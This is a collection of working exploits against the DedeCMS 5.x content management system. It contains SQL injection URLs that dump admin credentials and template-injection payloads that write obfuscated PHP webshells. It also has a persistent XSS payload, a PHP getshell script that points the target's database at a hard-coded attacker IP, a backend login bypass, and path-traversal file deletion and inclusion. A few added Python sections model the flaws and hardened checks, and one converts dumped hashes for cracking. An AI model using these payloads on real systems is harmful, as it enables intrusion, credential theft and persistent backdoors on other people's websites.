Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
The error-based updatexml() payload returns the admin user name and MID(pwd,4,16), the 16-character MD5 slice of the stored 20-character hash, inside square brackets in the XML error message.
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a "software" item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php, a one-line shell with password xiao: eC5waHA decodes to x.php and the second base64 string decodes to <?php eval($_POST[xiao])?>baidu.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(%23@__ is the #@__ table-prefix placeholder DedeCMS expands to the configured prefix, dede_ by default.)
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; it triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be switched off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. Whichever of the URLs below is visited afterwards, our XSS fires again, because the script stored its own payload in a gotopage cookie and login.php reads gotopage from the cookie as readily as from the query string.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php
<?php
// DedeCMS variable-overwrite getshell. The POST body sets
// _COOKIE[GLOBALS][cfg_db*] so the target connects to the attacker's MySQL
// server (184.105.174.114 in the hard-coded body), whose dede_mytag row
// carries the PHP that writes fuck.php; mytag_js.php?aid=N selects the row.
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath= /   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];   // host name without scheme, e.g. www.site.com
$aid=$argv[2];   // which dede_mytag row on the attacker's DB to render
$path=$argv[3];  // sub-directory the site lives in, e.g. old
$exp=Getshell($url,$aid,$path);
// Getshell() returns the HTTP status line; "HTTP/1.1 200 OK" puts "OK" at offset 13
if (strpos($exp,"OK")>12){
    echo "\nExploit Success \n";
    if($aid==1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2) echo "Shell:".$url."/$path/fuck.php\n";
    if($aid==3) echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "\nExploit Failed \n";
}

function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // Same fields as the variable-overwrite form: doaction plus the overridden cfg_db* values
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
        return '';
    }
    fwrite($ock,$data);
    // Only the first line of the response (the status line) is needed
    $exp=fgets($ock, 1024);
    fclose($ock);
    return $exp;
}
?>
DedeCms v5.6-5.7 unauthorised access vulnerability (straight into the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
(织梦网站后台 in the URL stands for the site's backend directory.) Change validate=dcug to the current CAPTCHA value and you are logged straight into the backend: the _POST[GLOBALS][cfg_db*] parameters redirect the database connection to the attacker's MySQL server, so the userid/pwd pair is checked against a dede_admin table the attacker controls.

Precondition: the backend path must be known.
Dedecms tag remote file write vulnerability
Precondition: set up your own Dede database and insert this row (the fwrite content is empty as posted; put your shell source there):
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit the form below; the shell appears as 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the target URL typed into the doaction field before it is submitted
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
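The three payloads that ride on _COOKIE[GLOBALS][cfg_db*] or _POST[GLOBALS][cfg_db*] (the getshell script, the login.php backend bypass and the form above) all exploit the same request-variable registration. The following added example, which is not DedeCMS code, models that registration in Python: the 5.6-era behaviour checks only the top-level keys of the original request arrays against ^(cfg_|GLOBALS) and then copies every key of $_GET, $_POST and $_COOKIE into a same-named variable, so a POST key literally named _COOKIE replaces the cookie array after the check has run. The hardened mode applies the recursive key check of the kind later DedeCMS releases adopted (modelled, not copied). `scope` stands in for the PHP symbol table, `config` for the cfg_* globals, and the treatment of a GLOBALS key as a merge into the configuration is an assumption about the PHP 5 behaviour the exploit relied on.

```python
import re

# Added model of DedeCMS 5.x request-variable registration; not DedeCMS code.
# PHP's bracket syntax (_COOKIE[GLOBALS][cfg_dbhost]=x) arrives here already
# parsed into nested dicts, as PHP would do.  Assumption: ${'GLOBALS'} = array(...)
# merged the array into the global scope, which config.update() stands in for.

DEFAULT_CONFIG = {
    "cfg_dbhost": "localhost", "cfg_dbuser": "dede", "cfg_dbpwd": "secret",
    "cfg_dbname": "dedecms", "cfg_dbprefix": "dede_",
}
TOPLEVEL_BAD = re.compile(r"^(cfg_|GLOBALS)")                      # 5.6-style check
RECURSIVE_BAD = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")  # hardened check


def check_request(val, pattern):
    """Hardened check: walk every key at every depth and reject it if it
    matches `pattern`, so the request arrays themselves cannot be renamed."""
    if isinstance(val, dict):
        for k, v in val.items():
            if pattern.match(k):
                raise ValueError("Request var not allow: " + k)
            check_request(v, pattern)


def register_request_vars(get, post, cookie, hardened=False):
    scope = {"_GET": dict(get), "_POST": dict(post), "_COOKIE": dict(cookie)}
    config = dict(DEFAULT_CONFIG)

    if hardened:
        for src in ("_GET", "_POST", "_COOKIE"):
            check_request(scope[src], RECURSIVE_BAD)
    else:
        # Vulnerable: only the top-level keys of the *original* arrays are checked.
        for src in ("_GET", "_POST", "_COOKIE"):
            for k in scope[src]:
                if TOPLEVEL_BAD.match(k):
                    raise ValueError("Request var not allow: " + k)

    for src in ("_GET", "_POST", "_COOKIE"):
        # scope[src] is looked up afresh each round: a POST key named "_COOKIE"
        # has by now replaced the real cookie array, and its contents were never checked.
        for key, value in list(scope[src].items()):
            if key == "GLOBALS" and isinstance(value, dict):
                config.update(value)      # ${'GLOBALS'} = array(...) overwrote cfg_*
            else:
                scope[key] = value        # ${$_k} = $_v
    return config


def exploit_outcome(get, post, cookie, hardened=False):
    """Return the cfg_dbhost the target would connect to, or 'blocked'."""
    try:
        return register_request_vars(get, post, cookie, hardened)["cfg_dbhost"]
    except ValueError:
        return "blocked"


# Constructed requests mirroring the payloads on this page.
FORM_POST = {   # the mytag_js.php form and exploit script: POST key "_COOKIE"
    "doaction": "http://www.tmdsb.com/plus/mytag_js.php?aid=1",
    "_COOKIE": {"GLOBALS": {"cfg_dbhost": "184.105.174.114", "cfg_dbuser": "exploit",
                            "cfg_dbpwd": "90sec", "cfg_dbname": "exploit", "cfg_dbprefix": "dede_"}},
    "nocache": "true",
}
LOGIN_GET = {   # the login.php bypass: GET key "_POST"
    "dopost": "login", "validate": "dcug", "userid": "admin", "pwd": "inimda",
    "_POST": {"GLOBALS": {"cfg_dbhost": "116.255.183.90", "cfg_dbuser": "root",
                          "cfg_dbpwd": "r0t0", "cfg_dbname": "root"}},
}

if __name__ == "__main__":
    print("direct GLOBALS key :", exploit_outcome({"GLOBALS": {"cfg_dbhost": "evil"}}, {}, {}))
    print("via _COOKIE (5.6)  :", exploit_outcome({}, FORM_POST, {}))
    print("via _POST (5.6)    :", exploit_outcome(LOGIN_GET, {}, {}))
    print("via _COOKIE (fixed):", exploit_outcome({}, FORM_POST, {}, hardened=True))
```

The direct form (a GLOBALS key in the query string) is already blocked by the top-level check, which is why every payload on this page goes through _COOKIE or _POST first; the check has to be recursive and has to cover the request-array names themselves, or the registration loop has to stop writing into the symbol table altogether.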
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go into the member backend, post an article and upload an image; then, in attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template content (if the image format is checked, prefix it with GIF89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source and build a form from it:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<!-- The crafted part: templet points at the uploaded "image" and dede_addonfields
     lists templet as an extra field so article_edit.php saves it with the article -->
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">
</div>
<!-- form action area -->
<h3 class="meTitle">Detailed content</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;><img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>CAPTCHA:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>
Submit; if the site reports the edit as successful, the template path has been changed.
3. Visit the modified article. Assuming the article's aid is 2, just request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written into the plus directory.
DEDECMS Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif (the Gif89a prefix satisfies the image-format check).
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Replace</button>
</form>

Build the form above; after the upload the image is stored at /uploads/userup/3/1.gif.
Post an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<!-- templet points at the uploaded gif; dede_addonfields makes article_edit.php save it -->
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
Dedecms (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The oldface path starts inside the user's own upload directory and climbs out with ../ segments, so a check on the prefix of the string passes while the file actually removed is /member/templets/images/m_logo.gif.
Dedecms (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
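The edit_face.php deletion above and the carbuyaction.php inclusion here are the same bug in two places: a path that begins inside a permitted directory and climbs out with ../. The following added example, which is not DedeCMS code, shows the prefix check that the deletion payload defeats next to a check that normalises the path first and confines the result to the allowed directory, and applies the same confinement to the include case. It is pure string logic so it runs offline; USERUP_ROOT and INCLUDE_ROOT are assumed layouts, not paths taken from DedeCMS.

```python
import posixpath
from typing import Optional

# Added example, not DedeCMS code.  USERUP_ROOT and INCLUDE_ROOT are assumptions
# standing in for the per-user upload directory and the include directory.
USERUP_ROOT = "/uploads/userup"
INCLUDE_ROOT = "/include"


def is_own_upload_prefix_check(path: str, uid: int) -> bool:
    """Vulnerable: accepts anything that merely *starts* in the user's directory."""
    return path.startswith(f"{USERUP_ROOT}/{uid}/")


def confine(candidate: str, base: str) -> Optional[str]:
    """Resolve `candidate` (absolute, or relative to `base`), collapse '.' and
    '..' segments, and return the result only if it is still strictly inside
    `base`; None means reject.  NUL bytes are rejected outright because the C
    file APIs underneath would truncate the path there."""
    if "\x00" in candidate:
        return None
    base = posixpath.normpath(base)
    full = candidate if candidate.startswith("/") else posixpath.join(base, candidate)
    resolved = posixpath.normpath(full)
    if resolved.startswith(base + "/"):
        return resolved
    return None


def is_own_upload(path: str, uid: int) -> bool:
    """Hardened replacement for the prefix check: the deletion target must
    resolve to a file under the caller's own upload directory."""
    return confine(path, f"{USERUP_ROOT}/{uid}") is not None


def resolve_include(code: str) -> Optional[str]:
    """Hardened include target: resolves to something under INCLUDE_ROOT, or None."""
    return confine(code, INCLUDE_ROOT)


if __name__ == "__main__":
    evil = "/uploads/userup/8/../../../member/templets/images/m_logo.gif"
    print("prefix check :", is_own_upload_prefix_check(evil, 8))   # True: m_logo.gif would be deleted
    print("confined     :", is_own_upload(evil, 8))                # False
    print("include ../..:", resolve_include("../../"))             # None
    print("include name :", resolve_include("alipay"))             # /include/alipay
```

Normalising with posixpath is deliberate: os.path.realpath would touch the filesystem and follow symlinks, which is the right final step on a real server but hides the string-level logic this example is about.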
Note on the plus/advancedsearch.php dump above: the dumped password is not a full MD5. DedeCMS stores the 32-character MD5 with the first 5 and the last 7 characters removed, a 20-character value; drop 3 more from the front and 1 from the end and you have the standard 16-character MD5, which can be cracked as usual.
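The note above and the MID(pwd,4,16) in the RSS injection payload at the top of the page describe the same slicing from two sides. The following added example, not DedeCMS code, implements both directions: producing the 20-character value DedeCMS keeps in dede_admin.pwd (substr(md5(pwd), 5, 20)), recovering the 16-character MD5 from a dumped hash, and checking that MySQL's 1-based MID(pwd,4,16) lands on exactly that slice.

```python
import hashlib

# Added example, not DedeCMS code.  DedeCMS keeps substr(md5($pwd), 5, 20) in
# dede_admin.pwd; the helpers below convert between that and the usual MD5 forms.


def md5_hex(plaintext: str) -> str:
    return hashlib.md5(plaintext.encode("utf-8")).hexdigest()


def dede_admin_hash(plaintext: str) -> str:
    """What dede_admin.pwd holds: the 32-char MD5 min the first 5 and last 7 chars."""
    return md5_hex(plaintext)[5:25]


def md5_16(plaintext: str) -> str:
    """The conventional 16-char MD5: characters 9..24 of the 32-char digest."""
    return md5_hex(plaintext)[8:24]


def dede_hash_to_md5_16(dede_hash: str) -> str:
    """Recover the crackable 16-char MD5 from a dumped 20-char hash: drop 3 from
    the front and 1 from the end (5 + 3 = 8, the offset where md5_16 starts)."""
    if len(dede_hash) != 20:
        raise ValueError("expected the 20-char DedeCMS hash")
    return dede_hash[3:19]


def mysql_mid(s: str, pos: int, length: int) -> str:
    """MySQL MID(str, pos, len) with a 1-based pos, as used in the updatexml payload."""
    return s[pos - 1:pos - 1 + length]


if __name__ == "__main__":
    stored = dede_admin_hash("admin")          # constructed sample credential
    print("dede_admin.pwd        :", stored)
    print("recovered 16-char MD5 :", dede_hash_to_md5_16(stored))
    print("MID(pwd,4,16) in SQL  :", mysql_mid(stored, 4, 16))
```

Feeding a dumped 20-character value to a cracker as if it were a truncated 32-character MD5 fails; the 16-character form is the one that cracking tools and lookup tables understand.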
Dedecms (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
Dedecms (织梦) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<!-- The cfg_* values would normally come from the server's own config; with
     register_globals on, the uninitialised variables are filled from this POST -->
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Dedecms (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
Exploits a MySQL numeric overflow error together with the fact that DedeCMS writes database errors into a PHP file (data/mysql_error_trace.php) with no protective header, so text from the failing query ends up as executable PHP.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.
2. Visit http://www.abc.com/data/mysql_error_trace.php. Seeing the following proves the injection succeeded: the */ in mid closed the comment the log writes the SQL into, and var_dump(3) ran.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the form's action is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the step-2 output again means the backdoor is in place.
Dedecms (织梦) plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*